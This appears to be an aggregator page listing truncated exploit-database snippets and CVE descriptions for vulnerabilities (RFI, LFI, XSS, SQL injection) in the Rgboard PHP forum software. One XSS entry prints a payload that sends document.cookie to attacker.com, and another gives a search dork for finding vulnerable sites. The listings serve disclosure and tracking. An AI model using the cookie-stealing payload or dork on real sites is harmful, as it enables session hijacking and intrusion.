EUVD-2008-2292

Malware in sbrugna...

EUVD-2008-2293

Malware in sbrugna...

rgboard <= 3.0.12 (rfi/xss) Multiple Vulnerabilities

No description provided by source. Rgboard 3.0.x Multiple Vulnerabilities RFI/XSS // Author:: e.wiZz! // Site:: www.balcanwarez.com // Contact:: N/A :D =========================================================== // Script :: Rgboard // Vulnerable version :: 3.0.0/3.0.12 // Not vulnerable :: 4.0 /...

rgboard 4.2.1 - SQL Injection Vulnerability

No description provided by source. Exploit Title: rgboard SQL Injection Vulnerability inurl: rgboard4/list.php Date: 2011. 6.22 Author: hamt0ry [email protected] Test on : Windowss XP SP3 Software Link: http://v4.rgboard.com/rg4board/down.php?&bbscode=rgboardpds&bdnum=1757&key=0&mode=down Version:...

rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities

No description provided by source. rgboard v4 5p1 07.07.27 Multiple Vulnerability bY [email protected] / rgboard VERSION v4 07.07.27is widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But I find a XSS vuln ,LFI vuln and RFI vuln. I...

rgboard 4.2.1 - SQL Injection

Exploit Title: rgboard SQL Injection Vulnerability inurl: rgboard4/list.php Date: 2011. 6.22 Author: hamt0ry [email protected] Test on : Windowss XP SP3 Software Link: http://v4.rgboard.com/rg4board/down.php?&bbscode=rgboardpds&bdnum=1757&key=0&mode=down Version: rgboard 4.2.1 SQL Injection...

rgboard 4.2.1 SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: rgboard SQL Injection Vulnerability inurl: rgboard4/list.php Date: 2011. 6.22 Author: hamt0ry email protected / / Test on : Windowss XP SP3 Software Link:...

rgboard 4.2.1 - SQL Injection

rgboard 4.2.1 - SQL Injection Exploit Title: rgboard SQL Injection Vulnerability inurl: rgboard4/list.php Date: 2011. 6.22 Author: hamt0ry [email protected] Test on : Windowss XP SP3 Software Link: http://v4.rgboard.com/rg4board/down.php?&bbscode=rgboardpds&bdnum=1757&key=0&mode=down Version: rgboa...

RGBoard 4.2.1 SQL Injection

Exploit Title: rgboard SQL Injection Vulnerability inurl: rgboard4/list.php Date: 2011. 6.22 Author: hamt0ry [email protected] / / Test on : Windowss XP SP3 Software Link: http://v4.rgboard.com/rg4board/down.php?&bbscode=rgboardpds&bdnum=1757&key=0&mode=down Version: rgboard 4.2.1 SQL Injection...

rgboard &lt;=4.2.0 任意文件下载漏洞

rgboard是韩国的一款php论坛 这是一个标准的逻辑漏洞 spamimg.php代码如下 $schkcode = $SESSION"schk".$chkcode; ifpregmatch'/^0-9/',$schkcode$ord // ???? $file='imagesspam/'.$schkcode$ord.".gif"; else ifpregmatch'/^a-z/',$schkcode$ord // ?????? $file='imagesspam/'.$schkcode$ord."1.gif"; else ifpregmatch'/^A-Z/',$schkcode$or...

rgboard v4 &#40;07.07.27&#41; Multiple Vulnerability

/ XSS Vulnerability /wrtie.php .. $bdcontent = rgconvtext$bdcontent,$bdhtml; //You have to check 'html use'. / poc: Inject XSS tag : img src = "http://attacker.com" onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location"Hi there! : /rghunter.php - Makes...

rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities

rgboard v4 5p1 07.07.27 Multiple Vulnerability bY [email protected] / rgboard VERSION v4 07.07.27is widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But I find a XSS vuln ,LFI vuln and RFI vuln. I attached a exploit that makes...

rgboard v4 5p1 (07.07.27) Multiple Remote Vulnerabilities

Exploit for unknown platform in category web applications ========================================================= rgboard v4 5p1 07.07.27 Multiple Remote Vulnerabilities ========================================================= / rgboard VERSION v4 07.07.27is widely used bulletin board system o...

rgboard 4 RFI / LFI / XSS

rgboard v4 5p1 07.07.27 Multiple Vulnerability bY [email protected] / rgboard VERSION v4 07.07.27is widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But I find a XSS vuln ,LFI vuln and RFI vuln. I attached a exploit that makes...

CVE-2008-2296

PHP remote file inclusion vulnerability in include/bbs.lib.inc.php in Rgboard 3.0.12 allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter...

CVE-2008-2295

Cross-site scripting XSS vulnerability in rgsearch.php in Rgboard 3.0.12, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the stext parameter and other unspecified vectors...

Remote file inclusion

PHP remote file inclusion vulnerability in include/bbs.lib.inc.php in Rgboard 3.0.12 allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter...

CVE-2008-2296

CVE-2008-2296 describes a PHP remote file inclusion vulnerability in Rgboard 3.0.12, specifically in the include/bbs.lib.inc.php file. The root cause is a vulnerable handling of the site_path parameter, allowing an attacker to supply a URL that causes arbitrary PHP code execution on the server. T...

CVE-2008-2296

PHP remote file inclusion vulnerability in include/bbs.lib.inc.php in Rgboard 3.0.12 allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter...

CVE-2008-2295

CVE-2008-2295 describes a cross-site scripting (XSS) vulnerability in the web application component rg_search.php of Rgboard 3.0.12 (and possibly earlier versions). The issue allows remote attackers to inject arbitrary web script or HTML via the s_text parameter and other unspecified vectors, tak...